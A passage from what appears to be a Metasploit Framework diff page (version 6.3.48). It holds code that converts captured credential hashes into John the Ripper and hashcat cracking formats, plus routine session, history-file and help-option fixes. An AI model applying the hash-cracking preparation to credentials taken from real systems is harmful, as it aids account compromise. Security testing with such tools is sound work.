# hash << "H:DC9894A01797D91D92ECA1DA66242209;"
|
||||
# hash << "T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C"
|
||||
# puts hash.join('')
|
||||
# S: = 60 characters -> sha1(password + salt (10 bytes))
|
||||
# 40 char sha1, 20 char salt
|
||||
# hash is 8F2D65FB5547B71C8DA3760F10960428CD307B1C
|
||||
# salt is 6271691FC55C1F56554A
|
||||
# H: = 32 characters
|
||||
# legacy MD5
|
||||
# T: = 160 characters
|
||||
# PBKDF2-based SHA512 hash specific to 12C (12.1.0.2+)
|
||||
when /raw-sha1|oracle11/ # oracle 11
|
||||
if cred.private.data =~ /S:([\dA-F]{60})/ # oracle 11
|
||||
return "#{cred.public.username}:#{Regexp.last_match(1)}:#{cred.id}:"
|
||||
end
|
||||
when /oracle12c/
|
||||
if cred.private.data =~ /T:([\dA-F]{160})/ # oracle 12c
|
||||
return "#{cred.public.username}:$oracle12c$#{Regexp.last_match(1).downcase}:#{cred.id}:"
|
||||
end
|
||||
when /dynamic_1506/
|
||||
if cred.private.data =~ /H:([\dA-F]{32})/ # oracle 11
|
||||
return "#{cred.public.username.upcase}:$dynamic_1506$#{Regexp.last_match(1)}:#{cred.id}:"
|
||||
end
|
||||
when /oracle/ # oracle
|
||||
if cred.private.jtr_format.start_with?('des') # 'des,oracle', not oracle11/12c
|
||||
return "#{cred.public.username}:O$#{cred.public.username}##{cred.private.data}:#{cred.id}:"
|
||||
end
|
||||
when /md5|des|bsdi|crypt|bf|sha256|sha512|xsha512/
|
||||
# md5(crypt), des(crypt), b(crypt), sha256(crypt), sha512(crypt), xsha512
|
||||
return "#{cred.public.username}:#{cred.private.data}:::::#{cred.id}:"
|
||||
when /xsha/
|
||||
# xsha512
|
||||
return "#{cred.public.username}:#{cred.private.data.upcase}:::::#{cred.id}:"
|
||||
when /netntlm/
|
||||
return "#{cred.private.data}::::::#{cred.id}:"
|
||||
when /qnx/
|
||||
# https://moar.so/blog/qnx-password-hash-formats.html
|
||||
hash = cred.private.data.end_with?(':0:0') ? cred.private.data : "#{cred.private.data}:0:0"
|
||||
return "#{cred.public.username}:#{hash}"
|
||||
when /Raw-MD5u/
|
||||
# This is just md5(unicode($p)), where $p is the password.
|
||||
# Avira uses to store their passwords, there may be other apps that also use this though.
|
||||
# The trailing : shows an empty salt. This is because hashcat only has one unicode hash
|
||||
# format which is combatible, type 30, but that is listed as md5(utf16le($pass).$salt)
|
||||
# with a sample hash of b31d032cfdcf47a399990a71e43c5d2a:144816. So this just outputs
|
||||
# The hash as *hash*: so that it is both JTR and hashcat compatible
|
||||
return "#{cred.private.data}:"
|
||||
when /vnc/
|
||||
# add a beginning * if one is missing
|
||||
return "$vnc$#{cred.private.data.start_with?('*') ? cred.private.data.upcase : "*#{cred.private.data.upcase}"}"
|
||||
else
|
||||
# /mysql|mysql-sha1/
|
||||
# /mssql|mssql05|mssql12/
|
||||
# /des(crypt)/
|
||||
# /mediawiki|phpass|atlassian/
|
||||
# /dynamic_82/
|
||||
# /ssha/
|
||||
# /raw-sha512/
|
||||
# /raw-sha256/
|
||||
# /xsha/
|
||||
# /mscash2/
|
||||
# This also handles *other* type credentials which aren't guaranteed to have a public
|
||||
|
||||
return "#{cred.public.nil? ? ' ' : cred.public.username}:#{cred.private.data}:#{cred.id}:"
|
||||
return "#{cred.public.nil? ? ' ' : cred.public.username}:#{cred.private.data}:#{cred.id}:"
|
||||
end
|
||||
end
|
||||
nil
|
||||
end
|
||||
|
||||
# This method takes a {framework.db.cred}, and normalizes it
|
||||
# from the JTR format to the DB format.
|
||||
#
|
||||
# @param [credClass] a credential from framework.db
|
||||
# @return [Array] All of the hash types that may be in the DB that apply
|
||||
def self.jtr_to_db(cred_type)
|
||||
case cred_type
|
||||
when 'descrypt' # from aix module
|
||||
return ['des']
|
||||
when 'oracle' # from databases module
|
||||
return ['des,oracle']
|
||||
when 'dynamic_1506'
|
||||
return ['dynamic_1506']
|
||||
when 'oracle11'
|
||||
return ['raw-sha1,oracle']
|
||||
when 'oracle12c'
|
||||
return ['pbkdf2,oracle12c']
|
||||
when 'dynamic_1034'
|
||||
return ['raw-md5,postgres']
|
||||
when 'md5crypt' # from linux module
|
||||
return ['md5']
|
||||
when 'descrypt'
|
||||
return ['des']
|
||||
when 'bsdicrypt'
|
||||
return ['bsdi']
|
||||
when 'sha256crypt'
|
||||
return ['sha256,crypt']
|
||||
when 'sha512crypt'
|
||||
return ['sha512,crypt']
|
||||
when 'bcrypt'
|
||||
return ['bf']
|
||||
end
|
||||
return [cred_type]
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
nil
|
||||
end
|
||||
|
||||
@@ -101,7 +101,7 @@ module Metasploit
|
||||
'hpux'
|
||||
when /AIX/i
|
||||
'aix'
|
||||
when /cygwin|Win32|Windows|Microsoft/i
|
||||
when /MSYS_NT|cygwin|Win32|Windows|Microsoft/i
|
||||
'windows'
|
||||
when /Unknown command or computer name|Line has invalid autocommand/i
|
||||
'cisco-ios'
|
||||
|
||||
@@ -32,7 +32,7 @@ module Metasploit
|
||||
end
|
||||
end
|
||||
|
||||
VERSION = "6.3.38"
|
||||
VERSION = "6.3.48"
|
||||
MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
|
||||
PRERELEASE = 'dev'
|
||||
HASH = get_hash
|
||||
|
||||
+17
-3
@@ -202,28 +202,38 @@ class Config < Hash
|
||||
|
||||
# Returns the full path to the history file.
|
||||
#
|
||||
# @return [String] path the history file.
|
||||
# @return [String] path to the history file.
|
||||
def self.history_file
|
||||
self.new.history_file
|
||||
end
|
||||
|
||||
# Returns the full path to the meterpreter history file.
|
||||
#
|
||||
# @return [String] path to the history file.
|
||||
def self.meterpreter_history
|
||||
self.new.meterpreter_history
|
||||
end
|
||||
|
||||
# Returns the full path to the smb session history file.
|
||||
#
|
||||
# @return [String] path to the history file.
|
||||
def self.smb_session_history
|
||||
self.new.smb_session_history
|
||||
end
|
||||
|
||||
def self.pry_history
|
||||
self.new.pry_history
|
||||
end
|
||||
# Returns the full path to the fav_modules file.
|
||||
#
|
||||
# @return [String] path the fav_modules file.
|
||||
# @return [String] path to the fav_modules file.
|
||||
def self.fav_modules_file
|
||||
self.new.fav_modules_file
|
||||
end
|
||||
|
||||
# Returns the full path to the handler file.
|
||||
#
|
||||
# @return [String] path the handler file.
|
||||
# @return [String] path to the handler file.
|
||||
def self.persist_file
|
||||
self.new.persist_file
|
||||
end
|
||||
@@ -316,6 +326,10 @@ class Config < Hash
|
||||
config_directory + FileSep + "meterpreter_history"
|
||||
end
|
||||
|
||||
def smb_session_history
|
||||
config_directory + FileSep + "smb_session_history"
|
||||
end
|
||||
|
||||
def pry_history
|
||||
config_directory + FileSep + "pry_history"
|
||||
end
|
||||
|
||||
@@ -834,6 +834,7 @@ class ReadableText
|
||||
def self.dump_sessions(framework, opts={})
|
||||
output = ""
|
||||
verbose = opts[:verbose] || false
|
||||
sessions = opts[:sessions] || framework.sessions
|
||||
show_active = opts[:show_active] || false
|
||||
show_inactive = opts[:show_inactive] || false
|
||||
# if show_active and show_inactive are false the caller didn't
|
||||
@@ -859,11 +860,11 @@ class ReadableText
|
||||
'Header' => "Active sessions",
|
||||
'Columns' => columns,
|
||||
'Indent' => indent)
|
||||
framework.sessions.each_sorted { |k|
|
||||
session = framework.sessions[k]
|
||||
|
||||
sessions.each do |session_id, session|
|
||||
row = create_msf_session_row(session, show_extended)
|
||||
tbl << row
|
||||
}
|
||||
end
|
||||
|
||||
output << (tbl.rows.count > 0 ? tbl.to_s : "#{tbl.header_to_s}No active sessions.\n")
|
||||
end
|
||||
@@ -984,9 +985,9 @@ class ReadableText
|
||||
return out
|
||||
end
|
||||
|
||||
framework.sessions.each_sorted do |k|
|
||||
session = framework.sessions[k]
|
||||
sessions = opts[:sessions] || framework.sessions
|
||||
|
||||
sessions.each do |session_id, session|
|
||||
sess_info = session.info.to_s
|
||||
sess_id = session.sid.to_s
|
||||
sess_name = session.sname.to_s
|
||||
|
||||
@@ -30,7 +30,7 @@ class CommandShell
|
||||
include Rex::Ui::Text::Resource
|
||||
|
||||
@@irb_opts = Rex::Parser::Arguments.new(
|
||||
'-h' => [false, 'Help menu.' ],
|
||||
['-h', '--help'] => [false, 'Help menu.' ],
|
||||
'-e' => [true, 'Expression to evaluate.']
|
||||
)
|
||||
|
||||
@@ -235,35 +235,35 @@ Shell Banner:
|
||||
end
|
||||
|
||||
def cmd_sessions(*args)
|
||||
if args.length.zero? || args[0].to_i <= 0
|
||||
# No args
|
||||
return cmd_sessions_help
|
||||
end
|
||||
|
||||
if args.length == 1 && (args[1] == '-h' || args[1] == 'help')
|
||||
# One arg, and args[1] => '-h' '-H' 'help'
|
||||
return cmd_sessions_help
|
||||
end
|
||||
|
||||
if args.length != 1
|
||||
# More than one argument
|
||||
print_status "Wrong number of arguments expected: 1, received: #{args.length}"
|
||||
return cmd_sessions_help
|
||||
end
|
||||
|
||||
if args[0].to_s == self.name.to_s
|
||||
if args[0] == '-h' || args[0] == '--help'
|
||||
return cmd_sessions_help
|
||||
end
|
||||
|
||||
session_id = args[0].to_i
|
||||
if session_id <= 0
|
||||
print_status 'Invalid session id'
|
||||
return cmd_sessions_help
|
||||
end
|
||||
|
||||
if session_id == self.sid
|
||||
# Src == Dst
|
||||
print_status("Session #{self.name} is already interactive.")
|
||||
else
|
||||
print_status("Backgrounding session #{self.name}...")
|
||||
# store the next session id so that it can be referenced as soon
|
||||
# as this session is no longer interacting
|
||||
self.next_session = args[0]
|
||||
self.next_session = session_id
|
||||
self.interacting = false
|
||||
end
|
||||
end
|
||||
|
||||
def cmd_resource(*args)
|
||||
if args.empty?
|
||||
if args.empty? || args[0] == '-h' || args[0] == '--help'
|
||||
cmd_resource_help
|
||||
return false
|
||||
end
|
||||
@@ -320,9 +320,9 @@ Shell Banner:
|
||||
end
|
||||
|
||||
def cmd_shell(*args)
|
||||
if args.length == 1 && (args[1] == '-h' || args[1] == 'help')
|
||||
# One arg, and args[1] => '-h' '-H' 'help'
|
||||
return cmd_sessions_help
|
||||
if args.length == 1 && (args[0] == '-h' || args[0] == '--help')
|
||||
# One arg, and args[0] => '-h' '--help'
|
||||
return cmd_shell_help
|
||||
end
|
||||
|
||||
if platform == 'windows'
|
||||
@@ -570,7 +570,7 @@ Shell Banner:
|
||||
# Open the Pry debugger on the current session
|
||||
#
|
||||
def cmd_pry(*args)
|
||||
if args.include?('-h')
|
||||
if args.include?('-h') || args.include?('--help')
|
||||
cmd_pry_help
|
||||
return
|
||||
end
|
||||
|
||||
@@ -95,6 +95,15 @@ class Meterpreter < Rex::Post::Meterpreter::Client
|
||||
self.console = Rex::Post::Meterpreter::Ui::Console.new(self)
|
||||
end
|
||||
|
||||
def exit
|
||||
begin
|
||||
self.core.shutdown
|
||||
rescue StandardError
|
||||
nil
|
||||
end
|
||||
self.shutdown_passive_dispatcher
|
||||
self.console.stop
|
||||
end
|
||||
#
|
||||
# Returns the session type as being 'meterpreter'.
|
||||
#
|
||||
@@ -593,6 +602,10 @@ class Meterpreter < Rex::Post::Meterpreter::Client
|
||||
sock
|
||||
end
|
||||
|
||||
def supports_udp?
|
||||
true
|
||||
end
|
||||
|
||||
#
|
||||
# Get a string representation of the current session platform
|
||||
#
|
||||
|
||||
@@ -183,6 +183,7 @@ module Scriptable
|
||||
execute_file(full_path, args)
|
||||
framework.events.on_session_script_run(self, full_path)
|
||||
rescue StandardError => e
|
||||
elog("Could not execute #{script_name}: #{e.class} #{e}", error: e)
|
||||
print_error("Could not execute #{script_name}: #{e.class} #{e}")
|
||||
end
|
||||
end
|
||||
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user